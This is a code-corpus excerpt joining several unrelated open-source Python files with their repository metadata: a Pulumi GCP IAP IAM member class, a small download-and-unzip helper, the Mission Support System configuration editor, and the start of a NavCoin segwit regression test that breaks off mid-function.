__props__.__dict__["etag"] = None
super(WebIamMember, __self__).__init__(
'gcp:iap/webIamMember:WebIamMember',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
condition: Optional[pulumi.Input[pulumi.InputType['WebIamMemberConditionArgs']]] = None,
etag: Optional[pulumi.Input[str]] = None,
member: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None) -> 'WebIamMember':
"""
Get an existing WebIamMember resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['WebIamMemberConditionArgs']] condition: ) An [IAM Condition](https://cloud.google.com/iam/docs/conditions-overview) for a given binding.
Structure is documented below.
:param pulumi.Input[str] etag: (Computed) The etag of the IAM policy.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the project will be parsed from the identifier of the parent resource. If no project is provided in the parent identifier and no project is specified, the provider project is used.
:param pulumi.Input[str] role: The role that should be applied. Only one
`iap.WebIamBinding` can be used per role. Note that custom roles must be of the format
`[projects|organizations]/{parent-name}/roles/{role-name}`.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _WebIamMemberState.__new__(_WebIamMemberState)
__props__.__dict__["condition"] = condition
__props__.__dict__["etag"] = etag
__props__.__dict__["member"] = member
__props__.__dict__["project"] = project
__props__.__dict__["role"] = role
return WebIamMember(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def condition(self) -> pulumi.Output[Optional['outputs.WebIamMemberCondition']]:
"""
) An [IAM Condition](https://cloud.google.com/iam/docs/conditions-overview) for a given binding.
Structure is documented below.
"""
return pulumi.get(self, "condition")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
(Computed) The etag of the IAM policy.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def member(self) -> pulumi.Output[str]:
return pulumi.get(self, "member")
@property
@pulumi.getter
def project(self) -> pulumi.Output[str]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the project will be parsed from the identifier of the parent resource. If no project is provided in the parent identifier and no project is specified, the provider project is used.
"""
return pulumi.get(self, "project")
@property
@pulumi.getter
def role(self) -> pulumi.Output[str]:
"""
The role that should be applied. Only one
`iap.WebIamBinding` can be used per role. Note that custom roles must be of the format
`[projects|organizations]/{parent-name}/roles/{role-name}`.
"""
return pulumi.get(self, "role")
| 44.823024 | 454 | 0.642427 |
758164568d21bee6437ac5f3320f2028db46c6f5 | 972 | py | Python | pycessing/download.py | kitao/pycessing | ab59dfbef7f52712e894f5b4d869c27f68bf3685 | [
"MIT"
] | null | null | null | pycessing/download.py | kitao/pycessing | ab59dfbef7f52712e894f5b4d869c27f68bf3685 | [
"MIT"
] | null | null | null | pycessing/download.py | kitao/pycessing | ab59dfbef7f52712e894f5b4d869c27f68bf3685 | [
"MIT"
] | null | null | null | import os
import sys
import urllib2
def download(url, dest_dir):
basename = os.path.basename(url)
sys.stdout.write('download {0} ... '.format(basename))
sys.stdout.flush()
filename = os.path.join(dest_dir, basename)
if not os.path.exists(dest_dir):
os.makedirs(dest_dir)
with open(filename, 'wb') as f:
f.write(urllib2.urlopen(url).read())
print 'done'
return filename
def unzip(filename):
import zipfile
dest_dir, basename = os.path.split(filename)
sys.stdout.write('unzip {0} ... '.format(basename))
sys.stdout.flush()
with zipfile.ZipFile(filename, 'r') as zf:
zf.extractall(dest_dir)
os.remove(filename)
for root, dirs, files in os.walk(dest_dir):
for name in files:
if name.startswith('._'):
os.remove(os.path.join(root, name))
print 'done'
def url_to_filename(url, dest_dir):
basename = os.path.basename(url)
def makedirs(path):
if not os.path.exists(path):
os.makedirs(path)
| 19.836735 | 56 | 0.675926 |
e22fbc391dee37f699b73cbbf6301accce114438 | 32,051 | py | Python | mslib/msui/editor.py | kawalpreettkaur/MSS | ee97789ddd320a4c47f4ceebaf72e792dc2b8d63 | [
"Apache-2.0"
] | 1 | 2021-10-05T16:23:43.000Z | 2021-10-05T16:23:43.000Z | mslib/msui/editor.py | kawalpreettkaur/MSS | ee97789ddd320a4c47f4ceebaf72e792dc2b8d63 | [
"Apache-2.0"
] | null | null | null | mslib/msui/editor.py | kawalpreettkaur/MSS | ee97789ddd320a4c47f4ceebaf72e792dc2b8d63 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
mslib.msui.editor
~~~~~~~~~~~~~~~~~~~~~~
config editor for mss_settings.json.
This file is part of mss.
:copyright: Copyright 2020 Vaibhav Mehra <veb7vmehra@gmail.com>
:copyright: Copyright 2020-2021 by the mss team, see AUTHORS.
:license: APACHE-2.0, see LICENSE for details.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import collections.abc
import copy
import fs
import logging
import json
from mslib.msui.mss_qt import get_open_filename, get_save_filename, show_popup
from mslib.msui.mss_qt import ui_configuration_editor_window as ui_conf
from PyQt5 import QtWidgets, QtCore, QtGui
from mslib.msui.constants import MSS_SETTINGS
from mslib.msui.icons import icons
from mslib.utils.config import MissionSupportSystemDefaultConfig as mss_default
from mslib.utils.config import config_loader, dict_raise_on_duplicates_empty, merge_data
from mslib.support.qt_json_view import delegate
from mslib.support.qt_json_view.view import JsonView
from mslib.support.qt_json_view.model import JsonModel
from mslib.support.qt_json_view.datatypes import match_type, DataType, TypeRole, ListType
InvalidityRole = TypeRole + 1
DummyRole = TypeRole + 2
default_options = config_loader(default=True)
def get_root_index(index, parents=False):
parent_list = []
while index.parent().isValid():
index = index.parent()
parent_list.append(index)
parent_list.reverse()
if parents:
return index, parent_list
return index
class JsonDelegate(delegate.JsonDelegate):
def paint(self, painter, option, index):
"""Use method from the data type or fall back to the default."""
if index.column() == 0:
source_model = index.model()
if isinstance(source_model, QtCore.QAbstractProxyModel):
source_model = source_model.sourceModel()
data = source_model.serialize()
# bold the key which has non-default value
root_index, parents = get_root_index(index, parents=True)
parents.append(index)
key = root_index.data()
if key in mss_default.list_option_structure or \
key in mss_default.dict_option_structure or \
key in mss_default.key_value_options:
if root_index == index and data[key] != default_options[key]:
option.font.setWeight(QtGui.QFont.Bold)
elif key in mss_default.fixed_dict_options:
model_data = data[key]
default_data = default_options[key]
for parent in parents[1:]:
parent_data = parent.data()
if isinstance(default_data, list):
parent_data = int(parent.data())
model_data = model_data[parent_data]
default_data = default_data[parent_data]
if model_data != default_data:
option.font.setWeight(QtGui.QFont.Bold)
return super(JsonDelegate, self).paint(painter, option, index)
type_ = index.data(TypeRole)
if isinstance(type_, DataType):
try:
super(JsonDelegate, self).paint(painter, option, index)
return type_.paint(painter, option, index)
except NotImplementedError:
pass
return super(JsonDelegate, self).paint(painter, option, index)
class JsonSortFilterProxyModel(QtCore.QSortFilterProxyModel):
def filterAcceptsRow(self, source_row, source_parent):
# check if an item is currently accepted
accepted = super(JsonSortFilterProxyModel, self).filterAcceptsRow(source_row, source_parent)
if accepted:
return True
# checking if parent is accepted (works only for indexes with depth 2)
src_model = self.sourceModel()
index = src_model.index(source_row, self.filterKeyColumn(), source_parent)
has_parent = src_model.itemFromIndex(index).parent()
if has_parent:
parent_index = self.mapFromSource(has_parent.index())
return super(JsonSortFilterProxyModel, self).filterAcceptsRow(has_parent.row(), parent_index)
return accepted
class ConfigurationEditorWindow(QtWidgets.QMainWindow, ui_conf.Ui_ConfigurationEditorWindow):
"""MSUI configuration editor class. Provides user interface elements for editing mss_settings.json
"""
restartApplication = QtCore.pyqtSignal(name="restartApplication")
def __init__(self, parent=None):
super(ConfigurationEditorWindow, self).__init__(parent)
self.setupUi(self)
options = config_loader()
self.path = MSS_SETTINGS
self.last_saved = copy.deepcopy(options)
self.optCb.addItem("All")
for option in sorted(options.keys(), key=str.lower):
self.optCb.addItem(option)
# Create view and place in parent widget
self.view = JsonView()
self.view.setItemDelegate(JsonDelegate())
self.view.setSelectionMode(QtWidgets.QAbstractItemView.ExtendedSelection)
self.jsonWidget.setLayout(QtWidgets.QVBoxLayout())
self.jsonWidget.layout().setContentsMargins(0, 0, 0, 0)
self.jsonWidget.layout().addWidget(self.view)
# Create proxy model for filtering
self.proxy_model = JsonSortFilterProxyModel()
self.json_model = JsonModel(data=options, editable_keys=True, editable_values=True)
self.json_model.setHorizontalHeaderLabels(['Option', 'Value'])
# Set view model
self.proxy_model.setSourceModel(self.json_model)
self.view.setModel(self.proxy_model)
# Setting proxy model and view attributes
self.proxy_model.setFilterKeyColumn(0)
# Add actions to toolbar
self.import_file_action = QtWidgets.QAction(
QtGui.QIcon(icons("config_editor", "Folder-new.svg")), "Import config", self)
self.import_file_action.setStatusTip("Import an external configuration file")
self.toolBar.addAction(self.import_file_action)
self.save_file_action = QtWidgets.QAction(
QtGui.QIcon(icons("config_editor", "Document-save.svg")), "Save config", self)
self.save_file_action.setStatusTip("Save current configuration")
self.toolBar.addAction(self.save_file_action)
self.export_file_action = QtWidgets.QAction(
QtGui.QIcon(icons("config_editor", "Document-save-as.svg")), "Export config", self)
self.export_file_action.setStatusTip("Export current configuration")
self.toolBar.addAction(self.export_file_action)
# Button signals
self.optCb.currentIndexChanged.connect(self.set_option_filter)
self.addOptBtn.clicked.connect(self.add_option_handler)
self.removeOptBtn.clicked.connect(self.remove_option_handler)
self.restoreDefaultsBtn.clicked.connect(self.restore_defaults)
self.moveUpTb.clicked.connect(lambda: self.move_option(move=1))
self.moveDownTb.clicked.connect(lambda: self.move_option(move=-1))
# File action signals
self.import_file_action.triggered.connect(self.import_config)
self.save_file_action.triggered.connect(self.save_config)
self.export_file_action.triggered.connect(self.export_config)
# View/Model signals
self.view.selectionModel().selectionChanged.connect(self.tree_selection_changed)
self.json_model.dataChanged.connect(self.update_view)
# set behaviour of widgets
self.moveUpTb.hide()
self.moveDownTb.hide()
self.moveUpTb.setAutoRaise(True)
self.moveUpTb.setArrowType(QtCore.Qt.UpArrow)
self.moveUpTb.setToolButtonStyle(QtCore.Qt.ToolButtonIconOnly)
self.moveDownTb.setAutoRaise(True)
self.moveDownTb.setArrowType(QtCore.Qt.DownArrow)
self.moveDownTb.setToolButtonStyle(QtCore.Qt.ToolButtonIconOnly)
self.moveUpTb.setEnabled(False)
self.moveDownTb.setEnabled(False)
self.addOptBtn.setEnabled(False)
self.removeOptBtn.setEnabled(False)
self.restoreDefaultsBtn.setEnabled(False)
# set tooltip and make keys non-editable
self.set_noneditable_items(QtCore.QModelIndex())
# json view attributes
self.view.setAlternatingRowColors(True)
self.view.setColumnWidth(0, self.view.width() // 2)
# Add invalidity roles and update status of keys
self.update_view()
self.restart_on_save = True
def set_noneditable_items(self, parent):
for r in range(self.json_model.rowCount(parent)):
index = self.json_model.index(r, 0, parent)
item = self.json_model.itemFromIndex(index)
item.setEditable(False)
if item.text() in mss_default.fixed_dict_options:
self.set_noneditable_items(index)
if item.text() in mss_default.config_descriptions:
item.setData(mss_default.config_descriptions[item.text()], QtCore.Qt.ToolTipRole)
def tree_selection_changed(self, selected, deselected):
"""Enable/Disable appropriate buttons based on selection in treeview
"""
selection = self.view.selectionModel().selectedRows()
# if no selection
add, remove, restore_defaults, move = [False] * 4
if len(selection) == 1:
index = selection[0]
if not index.parent().isValid():
move = True
root_index = get_root_index(index)
if root_index.data() not in mss_default.fixed_dict_options + mss_default.key_value_options:
add, move = True, True
# display error message if key has invalid values
if not index.parent().isValid():
root_index = get_root_index(index)
source_index = self.proxy_model.mapToSource(root_index)
item = self.json_model.itemFromIndex(source_index)
if any(item.data(InvalidityRole)):
invalidity = item.data(InvalidityRole)
errors = {"empty": invalidity[0], "duplicate": invalidity[1], "invalid": invalidity[2]}
msg = ", ".join([key for key in errors if errors[key]])
msg += " values found"
self.statusbar.showMessage(msg)
elif item.data(DummyRole):
self.statusbar.showMessage("Dummy values found")
else:
self.statusbar.showMessage("")
if len(selection) >= 1:
restore_defaults = True
for index in selection:
index = get_root_index(index)
if index.data() not in mss_default.fixed_dict_options + mss_default.key_value_options \
and self.proxy_model.rowCount(index) > 0:
remove = True
break
self.addOptBtn.setEnabled(add)
self.removeOptBtn.setEnabled(remove)
self.restoreDefaultsBtn.setEnabled(restore_defaults)
self.moveUpTb.setEnabled(move)
self.moveDownTb.setEnabled(move)
def update_view(self):
"""
Set InvalidRole and DummyRole for all root items in the treeview and highlight appropriately.
InvalidRole -> Boolean list indicating if item has Empty, Duplicate, Invalid values
DummyRole -> Boolean value indicating if item has dummy value
"""
source_model = self.json_model
data = source_model.serialize()
parent = QtCore.QModelIndex()
for r in range(source_model.rowCount(parent)):
root_index = source_model.index(r, 0, parent)
root_item = source_model.itemFromIndex(root_index)
empty, duplicate, invalid, dummy = [False] * 4
color = QtCore.Qt.transparent
key = root_index.data()
if key in mss_default.dict_option_structure:
child_keys = set()
rows = source_model.rowCount(root_index)
for row in range(rows):
child_key_data = source_model.index(row, 0, root_index).data()
child_keys.add(child_key_data)
if child_key_data == "":
empty = True
# check for dummy values
default = mss_default.dict_option_structure[key]
values_dict = data[key]
for value in values_dict:
if value in default:
if default[value] == values_dict[value]:
dummy = True
color = QtCore.Qt.gray
break
# condition for checking duplicate and empty keys
if len(child_keys) != rows or empty:
duplicate = True
color = QtCore.Qt.red
elif key in mss_default.list_option_structure:
values_list = data[key]
# check if any dummy values
if any([value == mss_default.list_option_structure[key][0] for value in values_list]):
dummy = True
color = QtCore.Qt.gray
# check if any empty values
if any([value == "" for value in values_list]):
empty = True
color = QtCore.Qt.red
# check if any duplicate values
if len(set(values_list)) != len(values_list):
duplicate = True
color = QtCore.Qt.red
elif key == 'filepicker_default':
if data[key] not in ['default', 'qt', 'fs']:
invalid = True
color = QtCore.Qt.red
# set invalidityroles and dummyrole for key
root_item.setData([empty, duplicate, invalid], InvalidityRole)
root_item.setData(dummy, DummyRole)
# set color for column 1
item = source_model.itemFromIndex(root_index)
item.setBackground(color)
# set color for column 2
source_index = source_model.index(r, 1, parent)
item = source_model.itemFromIndex(source_index)
item.setBackground(color)
def set_option_filter(self, index):
# By default FilterKeyColumn of the proxy model is set to 0
if self.optCb.currentText() == "All":
self.proxy_model.setFilterRegExp("")
return
self.proxy_model.setFilterRegExp(QtCore.QRegExp(f"^{self.optCb.currentText()}$"))
self.view.expandAll()
def add_option_handler(self):
selection = self.view.selectionModel().selectedRows()
if len(selection) == 0 or len(selection) > 1:
logging.debug("zero or multiple selections while trying to add new value")
self.statusbar.showMessage("Please select one option to add new value")
return
selected_index = get_root_index(selection[0])
option = selected_index.data()
parent = QtCore.QModelIndex()
for r in range(self.json_model.rowCount(parent)):
index = self.json_model.index(r, 0, parent)
item = self.json_model.itemFromIndex(index)
if index.data() == option:
if option in mss_default.fixed_dict_options + mss_default.key_value_options:
# Cannot add options to fixed structure options
self.statusbar.showMessage(
"Option already exists. Please change value to your preference or restore to default.")
return
elif option in mss_default.dict_option_structure:
# Append dummy value dict to options having a dictionary structure
json_data = mss_default.dict_option_structure[option]
type_ = match_type(json_data)
type_.next(model=self.json_model, data=json_data, parent=item)
elif option in mss_default.list_option_structure:
# Append dummy value to options having a list structure
json_data = mss_default.list_option_structure[option]
type_ = match_type(json_data)
type_.next(model=self.json_model, data=json_data, parent=item)
# increase row count in view
rows = self.json_model.rowCount(index) - 1
new_item = self.json_model.itemFromIndex(self.json_model.index(rows, 0, index))
new_item.setData(rows, QtCore.Qt.DisplayRole)
self.statusbar.showMessage("")
# expand root item
proxy_index = self.proxy_model.mapFromSource(index)
self.view.expand(proxy_index)
# expand, scroll to and select new item
rows = self.json_model.rowCount(index) - 1
new_index = self.json_model.index(rows, 0, index)
proxy_index = self.proxy_model.mapFromSource(new_index)
self.view.expand(proxy_index)
self.view.scrollTo(proxy_index)
self.view.selectionModel().select(
proxy_index, QtCore.QItemSelectionModel.ClearAndSelect | QtCore.QItemSelectionModel.Rows)
logging.debug("Added new value for %s" % option )
self.update_view()
break
def remove_option_handler(self):
selection = self.view.selectionModel().selectedRows()
if len(selection) == 0:
logging.debug("zero selections while trying to remove option")
self.statusbar.showMessage("Please select one/more options to remove")
return
# Collect all removable indexes from selected items
non_removable = []
removable_indexes = {}
for index in selection:
if not index.parent().isValid():
if index.data() not in mss_default.fixed_dict_options + mss_default.key_value_options:
removable_indexes[index] = set(range(self.proxy_model.rowCount(index)))
else:
# cannot remove root item
non_removable.append(index)
else:
# find penultimate option key
while index.parent().parent().isValid():
index = index.parent()
root = index.parent()
# enter only if root option not in fixed dictionary / key value options
if root.data() not in mss_default.fixed_dict_options + mss_default.key_value_options:
if root in removable_indexes:
removable_indexes[root].add(index.row())
else:
removable_indexes[root] = set([index.row()])
else:
non_removable.append(index)
if removable_indexes == {} and non_removable != []:
self.statusbar.showMessage("Default options are not removable.")
return
# ToDo add confirmation dialog here
options = "\n".join([index.data() for index in removable_indexes])
logging.debug("Attempting to remove the following options\n%s" % options)
self.view.selectionModel().clearSelection()
for index in removable_indexes:
rows = sorted(list(removable_indexes[index]))
for count, row in enumerate(rows):
row = row - count
self.proxy_model.removeRow(row, parent=index)
# fix row number in list type options
source_index = self.proxy_model.mapToSource(index)
source_item = self.json_model.itemFromIndex(source_index)
if isinstance(source_item.data(QtCore.Qt.UserRole + 1), ListType):
for r in range(self.json_model.rowCount(source_index)):
child_index = self.json_model.index(r, 0, source_index)
item = self.json_model.itemFromIndex(child_index)
item.setData(r, QtCore.Qt.DisplayRole)
self.statusbar.showMessage("Successfully removed values selected options")
self.update_view()
def restore_defaults(self):
def update(data, option, value):
"""Function to update dict at a depth"""
for k, v in data.items():
if k == option:
data[k] = value
break
if isinstance(v, collections.abc.Mapping):
data[k] = update(data.get(k, {}), option, value)
return data
selection = self.view.selectionModel().selectedRows()
if len(selection) == 0:
logging.debug("no selections while trying to restore defaults")
self.statusbar.showMessage("Please select one/more options to restore defaults")
return
# get list of distinct indexes to restore
model_data = self.json_model.serialize()
selected_indexes = set()
for index in selection:
root_index, parent_list = get_root_index(index, parents=True)
added = False
data = model_data
for parent in parent_list + [index]:
data = data[parent.data()]
if isinstance(data, list):
added = True
selected_indexes.add(parent)
break
if not added:
selected_indexes.add(index)
# ToDo add confirmation dialog here
options = "\n".join([index.data() for index in selected_indexes])
logging.debug("Attempting to restore defaults for the following options\n%s" % options)
for index in selected_indexes:
# check if root option and present in mss_default.key_value_options
if not index.parent().isValid() and index.data() in mss_default.key_value_options:
value_index = self.json_model.index(index.row(), 1, QtCore.QModelIndex())
value_item = self.json_model.itemFromIndex(value_index)
value_item.setData(default_options[index.data()], QtCore.Qt.DisplayRole)
continue
root_index, parent_list = get_root_index(index, parents=True)
option = root_index.data()
model_data = self.json_model.serialize()
if option in mss_default.fixed_dict_options:
if index == root_index:
json_data = default_options[option]
else:
key = None
value = copy.deepcopy(default_options)
for parent in parent_list + [index]:
parent_data = parent.data()
if isinstance(value, list):
break
key = parent_data
value = value[parent_data]
data = copy.deepcopy(model_data[option])
json_data = update(data, key, value)
else:
json_data = default_options[option]
if model_data[option] == json_data:
continue
# remove all rows
for row in range(self.proxy_model.rowCount(root_index)):
self.proxy_model.removeRow(0, parent=root_index)
# add default values
source_index = self.proxy_model.mapToSource(root_index)
source_item = self.json_model.itemFromIndex(source_index)
type_ = match_type(json_data)
type_.next(model=self.json_model, data=json_data, parent=source_item)
self.statusbar.showMessage("Defaults restored for selected options")
self.view.clearSelection()
self.update_view()
def import_config(self):
file_path = get_open_filename(self, "Import config", "", ";;".join(["JSON Files (*.json)", "All Files (*.*)"]))
if not file_path:
return
# load data from selected file
dir_name, file_name = fs.path.split(file_path)
with fs.open_fs(dir_name) as _fs:
if _fs.exists(file_name):
file_content = _fs.readtext(file_name)
try:
json_file_data = json.loads(file_content, object_pairs_hook=dict_raise_on_duplicates_empty)
except json.JSONDecodeError as e:
show_popup(self, "Error while loading file", e)
logging.error("Error while loading json file %s" % e)
return
except ValueError as e:
show_popup(self, "Invalid keys detected", e)
logging.error("Error while loading json file %s" % e)
return
if json_file_data:
json_model_data = self.json_model.serialize()
options = merge_data(copy.deepcopy(json_model_data), json_file_data)
if options == json_model_data:
self.statusbar.showMessage("No option with new values found")
return
# replace existing data with new data
self.json_model.init(options, editable_keys=True, editable_values=True)
self.view.setColumnWidth(0, self.view.width() // 2)
self.set_noneditable_items(QtCore.QModelIndex())
self.update_view()
self.statusbar.showMessage("Successfully imported config")
logging.debug("Imported new config data from file")
else:
self.statusbar.showMessage("No data found in the file")
logging.debug("No data found in the file, using existing settings")
def _save_to_path(self, filename):
self.last_saved = self.json_model.serialize()
json_data = copy.deepcopy(self.last_saved)
save_data = copy.deepcopy(self.last_saved)
for key in json_data:
if json_data[key] == default_options[key] or json_data[key] == {} or json_data[key] == []:
del save_data[key]
dir_name, file_name = fs.path.split(filename)
with fs.open_fs(dir_name) as _fs:
_fs.writetext(file_name, json.dumps(save_data, indent=4))
def validate_data(self):
invalid, dummy = False, False
parent = QtCore.QModelIndex()
for r in range(self.json_model.rowCount(parent)):
index = self.json_model.index(r, 0, parent)
item = self.json_model.itemFromIndex(index)
invalid |= any(item.data(InvalidityRole))
dummy |= item.data(DummyRole)
return invalid, dummy
def check_modified(self):
return not self.last_saved == self.json_model.serialize()
def save_config(self):
invalid, dummy = self.validate_data()
if invalid:
show_popup(
self,
"Invalid values detected",
"Please correct the invalid values (keys colored in red) to be able to save.")
self.statusbar.showMessage("Please correct the values and try saving again")
return False
if dummy and self.check_modified():
ret = QtWidgets.QMessageBox.warning(
self, self.tr("Dummy values detected"),
self.tr("Dummy values detected (keys colored in gray.)\n"
"Since they are dummy values you might face issues later on while working."
"\n\nDo you still want to continue to save?"),
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No,
QtWidgets.QMessageBox.No)
if ret == QtWidgets.QMessageBox.No:
self.statusbar.showMessage("Please correct the values and try saving")
return False
if self.check_modified():
if self.restart_on_save:
ret = QtWidgets.QMessageBox.warning(
self, self.tr("Mission Support System"),
self.tr("Do you want to restart the application?\n"
"(This is necessary to apply changes)\n\n"
"Please note that clicking 'No' will not save the current configuration"),
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No,
QtWidgets.QMessageBox.No)
if ret == QtWidgets.QMessageBox.Yes:
logging.debug("saving config file to: %s and restarting MSS" % self.path)
self._save_to_path(self.path)
self.restartApplication.emit()
self.restart_on_save = False
self.close()
else:
return
self.restart_on_save = True
logging.debug("saving config file to: %s" % self.path)
self._save_to_path(self.path)
else:
self.statusbar.showMessage("No values changed")
return True
def export_config(self):
invalid, dummy = self.validate_data()
if invalid:
show_popup(
self,
"Invalid values detected",
"Please correct the invalid values (keys colored in red) to be able to save.")
self.statusbar.showMessage("Please correct the values and try exporting")
return False
if self.json_model.serialize() == default_options:
msg = """Since the current configuration matches the default configuration, \
only an empty json file would be exported.\nDo you still want to continue?"""
ret = QtWidgets.QMessageBox.warning(
self, self.tr("Mission Support System"), self.tr(msg),
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No,
QtWidgets.QMessageBox.No)
if ret == QtWidgets.QMessageBox.No:
return
path = get_save_filename(self, "Export configuration", "mss_settings", "JSON files (*.json)")
if path:
self._save_to_path(path)
def closeEvent(self, event):
msg = ""
invalid, dummy = self.validate_data()
if invalid:
msg = self.tr("Invalid keys/values found in config.\nDo you want to rectify and save changes?")
elif dummy and not self.check_modified:
msg = self.tr("Dummy keys/values found in config.\nDo you want to rectify and save changes?")
elif self.check_modified():
msg = self.tr(
"Save Changes to default mss_settings.json?\nYou need to restart the gui for changes to take effect.")
if msg != "":
ret = QtWidgets.QMessageBox.warning(
self, self.tr("Mission Support System"), self.tr(msg),
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No,
QtWidgets.QMessageBox.No)
if ret == QtWidgets.QMessageBox.Yes:
if not self.save_config():
event.ignore()
return
elif self.restart_on_save:
ret = QtWidgets.QMessageBox.warning(
self, self.tr("Mission Support System"),
self.tr("Do you want to close the config editor?"),
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No,
QtWidgets.QMessageBox.No)
if ret == QtWidgets.QMessageBox.No:
event.ignore()
return
event.accept()
| 45.205924 | 119 | 0.608062 |
69a6f87cbb67029a5ad349cf5638bd93652e9ff8 | 12,234 | py | Python | qa/rpc-tests/segwit.py | supertref/navcoin-core | cc6fd1c9661fcbd3b82c8f2506c0f863da43b392 | [
"MIT"
] | 1 | 2020-08-28T02:32:47.000Z | 2020-08-28T02:32:47.000Z | qa/rpc-tests/segwit.py | supertref/navcoin-core | cc6fd1c9661fcbd3b82c8f2506c0f863da43b392 | [
"MIT"
] | 3 | 2019-07-18T02:10:02.000Z | 2019-08-28T22:09:31.000Z | qa/rpc-tests/segwit.py | supertref/navcoin-core | cc6fd1c9661fcbd3b82c8f2506c0f863da43b392 | [
"MIT"
] | 2 | 2020-09-06T20:02:00.000Z | 2020-11-19T18:47:42.000Z | #!/usr/bin/env python3
# Copyright (c) 2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test the SegWit changeover logic
#
from test_framework.test_framework import NavCoinTestFramework
from test_framework.util import *
from test_framework.mininode import sha256, ripemd160
import os
import shutil
NODE_0 = 0
NODE_1 = 1
NODE_2 = 2
WIT_V0 = 0
WIT_V1 = 1
def witness_script(version, pubkey):
if (version == 0):
pubkeyhash = bytes_to_hex_str(ripemd160(sha256(hex_str_to_bytes(pubkey))))
pkscript = "0014" + pubkeyhash
elif (version == 1):
# 1-of-1 multisig
scripthash = bytes_to_hex_str(sha256(hex_str_to_bytes("5121" + pubkey + "51ae")))
pkscript = "0020" + scripthash
else:
assert("Wrong version" == "0 or 1")
return pkscript
def addlength(script):
scriptlen = format(len(script)//2, 'x')
assert(len(scriptlen) == 2)
return scriptlen + script
def create_witnessprogram(version, node, utxo, pubkey, encode_p2sh, amount):
pkscript = witness_script(version, pubkey);
if (encode_p2sh):
p2sh_hash = bytes_to_hex_str(ripemd160(sha256(hex_str_to_bytes(pkscript))))
pkscript = "a914"+p2sh_hash+"87"
inputs = []
outputs = {}
inputs.append({ "txid" : utxo["txid"], "vout" : utxo["vout"]} )
DUMMY_P2SH = "2MySexEGVzZpRgNQ1JdjdP5bRETznm3roQ2" # P2SH of "OP_1 OP_DROP"
outputs[DUMMY_P2SH] = amount
tx_to_witness = node.createrawtransaction(inputs,outputs)
#replace dummy output with our own
tx_to_witness = tx_to_witness[0:110] + addlength(pkscript) + tx_to_witness[-8:]
return tx_to_witness
def send_to_witness(version, node, utxo, pubkey, encode_p2sh, amount, sign=True, insert_redeem_script=""):
tx_to_witness = create_witnessprogram(version, node, utxo, pubkey, encode_p2sh, amount)
if (sign):
signed = node.signrawtransaction(tx_to_witness)
assert("errors" not in signed or len(["errors"]) == 0)
return node.sendrawtransaction(signed["hex"])
else:
if (insert_redeem_script):
tx_to_witness = tx_to_witness[0:82] + addlength(insert_redeem_script) + tx_to_witness[84:]
return node.sendrawtransaction(tx_to_witness)
def getutxo(txid):
utxo = {}
utxo["vout"] = 0
utxo["txid"] = txid
return utxo
def find_unspent(node, min_value):
for utxo in node.listunspent():
if utxo['amount'] >= min_value:
return utxo
class SegWitTest(NavCoinTestFramework):
def setup_chain(self):
print("Initializing test directory "+self.options.tmpdir)
initialize_chain_clean(self.options.tmpdir, 3)
def setup_network(self):
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, ["-logtimemicros", "-debug", "-walletprematurewitness"]))
self.nodes.append(start_node(1, self.options.tmpdir, ["-logtimemicros", "-debug", "-blockversion=4", "-promiscuousmempoolflags=517", "-prematurewitness", "-walletprematurewitness"]))
self.nodes.append(start_node(2, self.options.tmpdir, ["-logtimemicros", "-debug", "-blockversion=536870915", "-promiscuousmempoolflags=517", "-prematurewitness", "-walletprematurewitness"]))
connect_nodes(self.nodes[1], 0)
connect_nodes(self.nodes[2], 1)
connect_nodes(self.nodes[0], 2)
self.is_network_split = False
self.sync_all()
def success_mine(self, node, txid, sign, redeem_script=""):
send_to_witness(1, node, getutxo(txid), self.pubkey[0], False, Decimal("49.998"), sign, redeem_script)
block = node.generate(1)
assert_equal(len(node.getblock(block[0])["tx"]), 2)
sync_blocks(self.nodes)
def skip_mine(self, node, txid, sign, redeem_script=""):
send_to_witness(1, node, getutxo(txid), self.pubkey[0], False, Decimal("49.998"), sign, redeem_script)
block = node.generate(1)
assert_equal(len(node.getblock(block[0])["tx"]), 1)
sync_blocks(self.nodes)
def fail_accept(self, node, txid, sign, redeem_script=""):
try:
send_to_witness(1, node, getutxo(txid), self.pubkey[0], False, Decimal("49.998"), sign, redeem_script)
except JSONRPCException as exp:
assert(exp.error["code"] == -26)
else:
raise AssertionError("Tx should not have been accepted")
def fail_mine(self, node, txid, sign, redeem_script=""):
send_to_witness(1, node, getutxo(txid), self.pubkey[0], False, Decimal("49.998"), sign, redeem_script)
try:
node.generate(1)
except JSONRPCException as exp:
assert(exp.error["code"] == -1)
else:
raise AssertionError("Created valid block when TestBlockValidity should have failed")
sync_blocks(self.nodes)
def run_test(self):
self.nodes[0].generate(161) #block 161
print("Verify sigops are counted in GBT with pre-BIP141 rules before the fork")
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 1)
